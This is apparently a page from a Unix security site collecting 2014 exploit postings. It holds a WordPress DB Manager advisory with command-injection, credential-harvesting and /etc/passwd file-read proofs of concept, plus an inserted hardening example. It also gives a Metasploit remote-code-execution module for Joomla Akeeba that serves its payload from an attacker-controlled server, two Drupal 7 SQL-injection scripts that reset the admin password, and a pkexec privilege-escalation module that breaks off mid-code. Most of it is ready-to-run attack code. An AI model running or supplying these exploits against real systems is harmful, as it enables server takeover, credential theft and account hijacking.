MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

22 Oct 2014

WordPress Database Manager 2.7.1 Command Injection / Credential Leak

Title: Vulnerabilities in WordPress Database Manager v2.7.1
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/wp-dbmanager/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html
CVE: CVE-2014-8334, CVE-2014-8335
OSVDB: 113508, 113507, 113509
 
Description: "Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing of database."
 
Vulnerability: The plugin suffers from command injection, exposes the MySQL database credentials in the process table, and allows the user to download system files via the 'Run SQL Query' feature. An authenticated user with the current_user_can('manage_database') capability is required. The full advisory has screenshots for illustration.
 
PoC
 
Command Injection
 
The command that is sent through passthru() is the following:
 
 
/usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" 
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db\';rce;\'/1413225588_-_wordpress.sql
 
 
rce is just a homebrew .c binary I wrote for testing command injections; it creates a file
in /tmp with some stats on who executed it.
 
 
# cat /tmp/RCE_JChl9c 
ARGGHHH I've been executed! my pid is :16169 Parent id 16168 
Name:        sh
State:        S (sleeping)
Tgid:        16168
Pid:        16168
PPid:        15925
TracerPid:        0
Uid:        33        33        33        33
Gid:        33        33        33        33
FDSize:        32
Groups:        33 
 
 
 
 
Commands can be injected into the following variables, which are used to build
the command, by using ;command;
 
 
$backup['filepath'] 
$backup['mysqldumppath']
 
 
I use $backup['filepath'] or "Path To Backup:" for my PoC.
 
 
/usr/share/wordpress/wp-content/backup-db;rce;
 
 
Saving and then running a backup executes /usr/bin/rce; the command that is sent through passthru() is the following:
 
 
/usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" 
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db;rce;/1413225588_-_wordpress.sql
 
 
rce is just a homebrew .c binary I wrote for testing command injections; it creates a file
in /tmp with some stats on who executed it.
 
 
# cat /tmp/RCE_JChl9c 
ARGGHHH I've been executed! my pid is :16169 Parent id 16168 
Name:        sh
State:        S (sleeping)
Tgid:        16168
Pid:        16168
PPid:        15925
TracerPid:        0
Uid:        33        33        33        33
Gid:        33        33        33        33
FDSize:        32
Groups:        33 
 
 
MySQL Credentials Leaked to Process Table
 
 
Also, by running a simple script (PoC):
$ while (true); do  echo -n `ps ax | grep m[y]sqldump`; done
 
 
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql
6328 ? R 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql
6328 ? S 0:00 /usr/bin/mysqldump --force --host=localhost --user=root --password=x xxxxxx --default-character-set=utf8 --add-drop-table --skip-lock-tables wordpress
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql
6328 ? S 0:00 /usr/bin/mysqldump --force --host=localhost --user=root --password=x xxxxxx --default-character-set=utf8 --add-drop-table --skip-lock-tables wordpress
 
 
A malicious local user can harvest credentials for the mysql database off the process table.
 
 
The root cause is that the code does not properly sanitize user input; the settings are passed directly to passthru() or system(), depending on which OS you are using.
 
 
In wp-dbmanager.php:
    86    $backup['command'] = '';
    87    $brace = (substr(PHP_OS, 0, 3) == 'WIN') ? '"' : '';
    88    if(intval($backup_options['backup_gzip']) == 1) {
    89            $backup['filename'] = $backup['date'].'_-_'.DB_NAME.'.sql.gz';
    90            $backup['filepath'] = $backup['path'].'/'.$backup['filename'];
    91            $backup['command'] = $brace.$backup['mysqldumppath'].$brace.' --force --host="'.$backup['host'].'" --user="'.DB_USER.'" --password="'.$backup['password'].'"'.$backup['port'].$backup['sock'].' --add-drop-table --skip-lock-tables '.DB_NAME.' | gzip > '.$brace.$backup['filepath'].$brace;
    92    } else {
    93            $backup['filename'] = $backup['date'].'_-_'.DB_NAME.'.sql';
    94            $backup['filepath'] = $backup['path'].'/'.$backup['filename'];
    95            $backup['command'] = $brace.$backup['mysqldumppath'].$brace.' --force --host="'.$backup['host'].'" --user="'.DB_USER.'" --password="'.$backup['password'].'"'.$backup['port'].$backup['sock'].' --add-drop-table --skip-lock-tables '.DB_NAME.' > '.$brace.$backup['filepath'].$brace;
    96    }
    97    execute_backup($backup['command']);
 
 
 
  211 ### Executes OS-Dependent mysqldump Command (By: Vlad Sharanhovich)
  212 function execute_backup($command) {
  213         $backup_options = get_option('dbmanager_options');
  214         check_backup_files();
  215         if(substr(PHP_OS, 0, 3) == 'WIN') {
  216                 $writable_dir = $backup_options['path'];
  217                 $tmpnam = $writable_dir.'/wp-dbmanager.bat';
  218                 $fp = fopen($tmpnam, 'w');
  219                 fwrite($fp, $command);
  220                 fclose($fp);
  221                 system($tmpnam.' > NUL', $error);
  222                 unlink($tmpnam);
  223         } else {
  224                 passthru($command, $error);
  225         }
  226         return $error;
  227 }
 
 
In database-manage.php:
    46    if(stristr($database_file, '.gz')) {
    47            $backup['command'] = 'gunzip < '.$brace.$backup['path'].'/'.$database_file.$brace.' | '.$brace.$backup['mysqlpath'].$brace.' --host="'.$backup['host'].'" --user="'.DB_USER.'" --password="'.$backup['password'].'"'.$backup['port'].$backup['sock'].$backup['charset'].' '.DB_NAME;
    48    } else {
    49            $backup['command'] = $brace.$backup['mysqlpath'].$brace.' --host="'.$backup['host'].'" --user="'.DB_USER.'" --password="'.$backup['password'].'"'.$backup['port'].$backup['sock'].$backup['charset'].' '.DB_NAME.' < '.$brace.$backup['path'].'/'.$database_file.$brace;
    50    }
    51    passthru($backup['command'], $error);
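As an added illustration of how the two command-line issues above are fixed (this is example code written for this page, not the plugin's own 2.7.2 patch, and it leaves out the plugin's port, socket and Windows .bat branches), the following PHP rebuilds the backup command so that every setting becomes one quoted shell argument and the password never reaches the command line. The function names build_backup_command() and write_mysql_defaults_file() are invented here; the $backup keys and the DB_USER / DB_NAME constants mirror the plugin's, with constructed values where the example needs them.

```php
<?php
// Added example, not code from the advisory or from the wp-dbmanager plugin:
// a hardened replacement for the command construction in wp-dbmanager.php.
// Assumed: $backup carries the same keys the plugin uses (mysqldumppath,
// host, password, path, date); DB_USER / DB_NAME normally come from wp-config.php.
if (!defined('DB_USER')) { define('DB_USER', 'wpuser'); }     // constructed
if (!defined('DB_NAME')) { define('DB_NAME', 'wordpress'); }  // constructed

// Write the credentials to a mode-0600 option file so they never appear on
// the command line, and therefore never in `ps` output. The caller unlinks it.
function write_mysql_defaults_file($host, $user, $password)
{
    $file = tempnam(sys_get_temp_dir(), 'dbm');
    if ($file === false) {
        throw new RuntimeException('cannot create credentials file');
    }
    chmod($file, 0600);
    // Option-file values may be double-quoted; a backslash and the quote
    // character inside such a value are escaped with a backslash.
    $quote = function ($v) {
        return '"' . str_replace(array('\\', '"'), array('\\\\', '\\"'), $v) . '"';
    };
    $ini = "[client]\n"
         . 'host=' . $quote($host) . "\n"
         . 'user=' . $quote($user) . "\n"
         . 'password=' . $quote($password) . "\n";
    file_put_contents($file, $ini);
    return $file;
}

// Build the mysqldump command line. Each variable part becomes exactly one
// shell word via escapeshellarg(), so ';', '|', '`' or '$(...)' in a setting
// can no longer terminate the command. Returns array($command, $credsFile).
function build_backup_command(array $backup, $gzip = false)
{
    // 1. The dump binary must resolve to a real executable named mysqldump,
    //    not to whatever string was typed into the settings page.
    $dump = realpath($backup['mysqldumppath']);
    if ($dump === false || !is_executable($dump) || basename($dump) !== 'mysqldump') {
        throw new InvalidArgumentException('mysqldumppath is not a mysqldump binary');
    }
    // 2. The backup location must be an existing directory.
    $dir = realpath($backup['path']);
    if ($dir === false || !is_dir($dir)) {
        throw new InvalidArgumentException('backup path is not a directory');
    }
    // 3. The date component is generated by the plugin, but validate it anyway.
    if (!preg_match('/^[0-9]+$/', $backup['date'])) {
        throw new InvalidArgumentException('bad date component');
    }
    $filepath = $dir . '/' . $backup['date'] . '_-_' . DB_NAME . '.sql' . ($gzip ? '.gz' : '');

    $creds = write_mysql_defaults_file($backup['host'], DB_USER, $backup['password']);

    // --defaults-extra-file must be the first option handed to mysqldump.
    $cmd = escapeshellarg($dump)
         . ' --defaults-extra-file=' . escapeshellarg($creds)
         . ' --force --add-drop-table --skip-lock-tables '
         . escapeshellarg(DB_NAME)
         . ($gzip ? ' | gzip' : '')
         . ' > ' . escapeshellarg($filepath);
    return array($cmd, $creds);
}

// Demonstration with the advisory's injected value as the backup path, using
// a throwaway directory so that the name really does contain ';rce;'.
$dir = sys_get_temp_dir() . '/backup-db;rce;';
if (!is_dir($dir)) { mkdir($dir, 0700); }
$backup = array(
    'mysqldumppath' => '/usr/bin/mysqldump',
    'host'          => 'localhost',
    'password'      => 'pass"word',   // constructed
    'path'          => $dir,
    'date'          => '1413225588',
);
try {
    list($cmd, $creds) = build_backup_command($backup);
    // The injected directory name is now one single-quoted argument of the
    // redirection, so the shell never sees a command separator.
    echo $cmd, "\n";
    // execute_backup($cmd) would run here; remove the credentials afterwards.
    unlink($creds);
} catch (Exception $e) {
    // On a host without /usr/bin/mysqldump step 1 rejects the request here.
    echo 'rejected: ', $e->getMessage(), "\n";
}
rmdir($dir);
```

The option file closes the process-table leak shown above: ps still displays --defaults-extra-file=/tmp/dbm..., but that file is mode 0600 and owned by the web server user, so another local user cannot read the password out of it. escapeshellarg() wraps each value in single quotes and escapes embedded quotes, so the advisory's backup-db;rce; path is delivered to the shell as a filename rather than as a command separator, and the realpath()/is_executable() checks additionally reject a mysqldumppath that is not a real binary. The 'Run SQL Query' file read is not a shell problem and is addressed on the database side instead: run the WordPress database user without the FILE privilege (and with secure_file_priv set), under which LOAD_FILE() returns NULL.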
 
 
 
 
File Downloads

In the 'Sql Run Query' panel only a few statement types are allowed ("Use Only INSERT, UPDATE, REPLACE, DELETE, CREATE and ALTER statements."), but these are sufficient to download sensitive system files:

CREATE TABLE password (passwords varchar(8096));

INSERT into password (passwords) VALUES(LOAD_FILE('/etc/passwd'));
 
 
Then run a database backup and download the backup file, or have it sent via email.
 
 
From 1413409573_-_wordpress.sql:
 
 
INSERT INTO `password` VALUES ('root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh\nbackup:x:34:34:backup:/var/backups:/bin/sh\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\nDebian-exim:x:101:104::/var/spool/exim4:/bin/false\nstatd:x:102:65534::/var/lib/nfs:/bin/false\nsshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin\npostgres:x:104:108:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\nlarry:x:1000:1000:larry,,,:/home/larry:/bin/bash\nmysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false\nmessagebus:x:106:110::/var/run/dbus:/bin/false\n');
/*!40000 ALTER TABLE `password` ENABLE KEYS */;


21 Oct 2014

Joomla Akeeba Kickstart Unserialize Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/zip'
require 'json'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Akeeba Kickstart Unserialize Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier
        3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba
        component, which is responsible for Joomla! updates. Nevertheless it is worth to note
        that this vulnerability is only exploitable during the update of the Joomla! CMS.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Johannes Dahse',               # Vulnerability discovery
          'us3r777 <us3r777[at]n0b0.so>'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2014-7228' ],
          [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],
          [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],
          [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]
        ],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Privileged'     => false,
      'DisclosureDate' => "Sep 29 2014",
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
        OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 5])
      ], self.class)
  end
 
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')
    )
 
    if res && res.code == 200
      return Exploit::CheckCode::Detected
    end
 
    Exploit::CheckCode::Safe
  end
 
  def primer
    srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip"
 
    php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'
    php_filename = rand_text_alpha(8 + rand(8)) + '.php'
 
    # Create the zip archive
    print_status("Creating archive with file #{php_filename}")
    zip_file = Rex::Zip::Archive.new
    zip_file.add_file(php_filename, payload.encoded)
    @zip = zip_file.pack
 
    # First step: call restore to run _prepare() and get an initialized AKFactory
    print_status("#{peer} - Sending PHP serialized object...")
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
      'vars_get'  => {
        'task'    => 'stepRestore',
        'factory' => Rex::Text.encode_base64(php_serialized_akfactory)
      }
    })
 
    unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
      print_status("#{res.code}\n#{res.body}")
      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
    end
 
    # Second step: modify the currentPartNumber within the returned serialized AKFactory
    json = /###(.*)###/.match(res.body)[1]
    begin
      b64encoded_prepared_factory = JSON.parse(json)['factory']
    rescue JSON::ParserError
      fail_with(Failure::Unknown, "#{peer} - Unexpected response, cannot parse JSON")
    end
 
    prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)
    modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1')
 
    print_status("#{peer} - Sending initialized and modified AKFactory...")
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
      'vars_get'  => {
        'task'    => 'stepRestore',
        'factory' => Rex::Text.encode_base64(modified_factory)
      }
    })
 
    unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
    end
 
    register_files_for_cleanup(php_filename)
 
    print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)
    }, 2)
 
  end
 
  def exploit
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
      # When the server stops due to our timeout, this is raised
    end
  end
 
  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    if @zip && request.uri =~ /\.zip$/
      print_status("Sending the ZIP archive...")
      send_response(cli, @zip, { 'Content-Type' => 'application/zip' })
      return
    end
 
    print_status("Sending not found...")
    send_not_found(cli)
  end
 
end


19 Oct 2014

Drupal Core 7.32 SQL Injection (python Version)

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# The argument check must run before the arguments are read, and the
# script name counts as argv[0], so four entries are expected.
if len(sys.argv) != 4:
    print "usage: host username password"
    print "e.g.:  http://nope.io admin wowsecure"
    sys.exit(1)
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
    print "Success!\nLogin now with user:%s and pass:%s" % (user, password)


19 Oct 2014

Drupal Core 7.32 SQL Injection (PHP Version)

<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
 
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
 
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
 
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>


18 Oct 2014

Linux PolicyKit Race Condition Privilege Escalation

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class Metasploit4 < Msf::Exploit::Local
  Rank = GreatRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
 
  include Msf::Exploit::Local::Linux
 
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Linux PolicyKit Race Condition Privilege Escalation',
      'Description'   => %q(
        A race condition flaw was found in the PolicyKit pkexec utility and polkitd
        daemon. A local user could use this flaw to appear as a privileged user to
        pkexec, allowing them to execute arbitrary commands as root by running
        those commands with pkexec.
 
        Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
        libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
        (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
      ),
      'License'       => MSF_LICENSE,
      'Author'        =>
      [
        'xi4oyu',                           # exploit
        '0a29406d9794e4f9b30b3c5d6702c708'  # metasploit module
      ],
      'Platform'       => [ 'linux'],
      'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'       =>
      [
        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
        [ 'Linux x64',       { 'Arch' => ARCH_X86_64 } ]
      ],
      'DefaultTarget' => 0,
      'References'    =>
      [
        [ 'CVE', '2011-1485' ],
        [ 'EDB', '17942' ],
        [ 'OSVDB', '72261' ]
      ],
      'DisclosureDate' => "Apr 01 2011"
    ))
    register_options([
      OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]),
      OptInt.new("Count", [true, "Number of attempts to win the race condition", 500 ]),
      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
      OptBool.new("DEBUG", [ true, "Make the exploit executable be verbose about what it's doing", false ])
    ])
  end
 
  def executable_path
    @executable_path ||= datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
    @executable_path
  end
 
  def exploit
    main = %q^
/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
* U can reach us  @ http://www.wooyun.org :)
* 0a2940: some changes
*/
/*
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
*/
 
#define dprintf
 
#define NULL ((void*)0)
 
#define MAP_PRIVATE   0x02
#define MAP_FIXED     0x10
#define MAP_ANONYMOUS 0x20
#define MAP_ANON MAP_ANONYMOUS
#define MAP_FAILED ((void *)-1)
 
#define PROT_READ  0x1
#define PROT_WRITE 0x2
#define PROT_EXEC  0x4
 
#define O_CREAT 64
#define O_RDWR 2
 
#define POLLRDNORM      0x0040
 
typedef int __pid_t;
typedef int __time_t;
typedef
struct {
        long __val[2];
} __quad_t;
typedef __quad_t __dev_t;
typedef long __ino_t;
typedef unsigned long __mode_t;
typedef long __nlink_t;
typedef unsigned int __uid_t;
typedef unsigned int __gid_t;
typedef long long __off_t;
typedef long __blksize_t;
typedef long long __blkcnt_t;
struct _stat_buff {
    __dev_t st_dev;                     /* Device.  */
    unsigned short int __pad1;
    __ino_t st_ino;                     /* File serial number.  */
    __mode_t st_mode;                   /* File mode.  */
    __nlink_t st_nlink;                 /* Link count.  */
    __uid_t st_uid;                     /* User ID of the file's owner. */
    __gid_t st_gid;                     /* Group ID of the file's group.*/
    __dev_t st_rdev;                    /* Device number, if device.  */
    unsigned short int __pad2;
    __off_t st_size;                    /* Size of file, in bytes.  */
    __blksize_t st_blksize;             /* Optimal block size for I/O.  */
    __blkcnt_t st_blocks;               /* Number 512-byte blocks allocated. */
    __time_t st_atime;                  /* Time of last access.  */
    unsigned long int st_atimensec;     /* Nscecs of last access.  */
    __time_t st_mtime;                  /* Time of last modification.  */
    unsigned long int st_mtimensec;     /* Nsecs of last modification.  */
    __time_t st_ctime;                  /* Time of last status change.  */
    unsigned long int st_ctimensec;     /* Nsecs of last status change.  */
    unsigned long int __unused4;
    unsigned long int __unused5;
};
 
struct _pollfd {
    int   fd;         /* file descriptor */
    short events;     /* requested events */
    short revents;    /* returned events */
};
typedef unsigned long size_t;
extern void *mmap(void *__addr, size_t __len, int __prot, int __flags, int __fd, __off_t __offset);
extern int mprotect(void *__addr, size_t __len, int __prot);
extern void exit(int __status);
extern int printf(const char *__format, ...);
extern __pid_t fork(void);
extern __time_t time(__time_t *t);
extern __pid_t getpid(void);
extern __uid_t geteuid(void);
extern void srand(unsigned int seed);
extern int snprintf(char *str, size_t size, const char *format, ...);
extern int pipe(int pipefd[2]);
extern int close(int fd);
extern void write(int fd, const void *buf, size_t count);
extern int dup2(int oldfd, int newfd);
extern void perror(const char *__s);
extern void read(int fd, void *buf, size_t count);
extern int execve(const char *filename, char *const argv[], char *const envp);
extern int usleep(int usec);
extern void *memset(void *s, int c, size_t n);
extern void *memcpy(void * dst, const void *src, size_t n);
extern int poll(struct _pollfd *fds, unsigned int nfds, int timeout);
extern char *strstr(const char *haystack, const char *needle);
extern int rand(void);
extern int unlink(const char *__name);
 
int main(int argc,char *argv[], char ** envp)
{
 
    __time_t tim_seed1;
    __pid_t pid_seed2;
    int result;
    struct _stat_buff stat_buff;
 
    char * chfn_path = "/usr/bin/chfn";
    char * cmd_path = "";
 
    char * pkexec_argv[] = {
        "/usr/bin/pkexec",
        "/bin/sh",
        "-c",
        cmd_path,
        NULL
    };
    int pipe1[2];
    int pipe2[2];
    int pipe3[2];
    __pid_t pid,pid2 ;
    char * chfn_argv[] = {
        "/usr/bin/chfn",
        NULL
    };
 
    char buff[8];
    char read_buff[4096];
    char real_path[512];
 
    int count = 0;
    int flag = 0;
    unsigned int usleep1 = 0;
    unsigned int usleep2 = 0;
 
    tim_seed1 = time(NULL);
    pid_seed2 = getpid();
    srand(tim_seed1+pid_seed2);
 
    if(!geteuid()){
 
      unlink(cmd_path);
 
      SHELLCODE
 
      int shellcode_size = 0;
      int i;
      unsigned long (*func)();
      func = mmap(NULL, 0x1000,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_PRIVATE | MAP_ANONYMOUS,
        0, 0
      );
      mprotect(func, 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
      dprintf("Copying %d bytes of shellcode\n", shellcode_size);
      //for (i = 0; i < shellcode_size; i++) {
        //(char)func[i] = (char)shellcode[i];
         memcpy(func,shellcode,shellcode_size);
      //}
      dprintf("Forking before calling shellcode: 0x%p\n", func);
      if (fork()) {
        exit(0);
      }
      func();
    }
 
    if(pipe(pipe1)){
        perror("pipe");
        exit(-2);
    }
 
    for(count = COUNT; count && !flag; count--){
        dprintf("count %d usleep1 %d usleep2 %d\n",count,usleep1,usleep2);
        pid = fork();
        if( !pid ){
            // Parent
            if( !pipe(pipe2)){
                if(!pipe(pipe3)){
                    pid2 = fork();
                    if(!pid2){
                        // Parent 2
                        close(1);
                        close(2);
                        close(pipe1[0]);
                        dup2(pipe1[1],2);
                        dup2(pipe1[1],1);
                        close(pipe1[1]);
                        close(pipe2[0]);
                        close(pipe3[1]);
                        write(pipe2[1],"\xFF",1);
                        read(pipe3[0],&buff,1);
                        execve(pkexec_argv[0],pkexec_argv,envp);
                        perror("execve pkexec");
                        exit(-3);
                    }
                    close(0);
                    close(1);
                    close(2);
                    close(pipe2[1]);
                    close(pipe3[0]);
                    read(pipe2[0],&buff,1);
                    write(pipe3[1],"\xFF",1);
                    usleep(usleep1+usleep2);
                    execve(chfn_argv[0],chfn_argv,envp);
                    perror("execve setuid");
                    exit(1);
                }
            }
            perror("pipe3");
            exit(1);
        }
 
        //Note: This is child, no pipe3 we use poll to monitor pipe1[0]
        memset(pipe3,0,8);
 
        struct _pollfd * pollfd = (struct pollfd *)(&pipe3);
        pollfd->fd = pipe1[0];
        pollfd->events =  POLLRDNORM;
 
        if(poll(pollfd,1,1000) < 0){
            perror("poll");
            exit(1);
        }
 
        if(pollfd->revents & POLLRDNORM ){
            memset(read_buff,0,4096);
            read(pipe1[0],read_buff,4095);
            if( strstr(read_buff,"does not match")){
                usleep1 += 100;
                usleep2 = rand() % 1000;
            }else{
                if(usleep1 > 0){
                  usleep1 -= 100;
                }
            }
        }
    }
    result = 0;
    unlink(cmd_path);
    return result;
}
 
^
    main.gsub!(/SHELLCODE/, Rex::Text.to_c(payload.encoded, 64, "shellcode"))
    main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload.encoded.length}")
    main.gsub!(/cmd_path = ""/, "cmd_path = \"#{executable_path}\"")
    main.gsub!(/COUNT/, datastore["Count"].to_s)
    main.gsub!(/#define dprintf/, "#define dprintf printf") if datastore['DEBUG']
 
    cpu = nil
    if target['Arch'] == ARCH_X86
      cpu = Metasm::Ia32.new
    elsif target['Arch'] == ARCH_X86_64
      cpu = Metasm::X86_64.new
    end
 
    begin
      elf = Metasm::ELF.compile_c(cpu, main).encode_string
    rescue
      print_error "Metasm Encoding failed: #{$ERROR_INFO}"
      elog "Metasm Encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
      elog "Call stack:\n#{$ERROR_INFO.backtrace.join("\n")}"
      return
    end
 
    print_status "Writing exploit executable to #{executable_path} (#{elf.length} bytes)"
    rm_f executable_path
    write_file(executable_path, elf)
    output = cmd_exec("chmod +x #{executable_path}; #{executable_path}")
    output.each_line { |line| print_debug line.chomp }
 
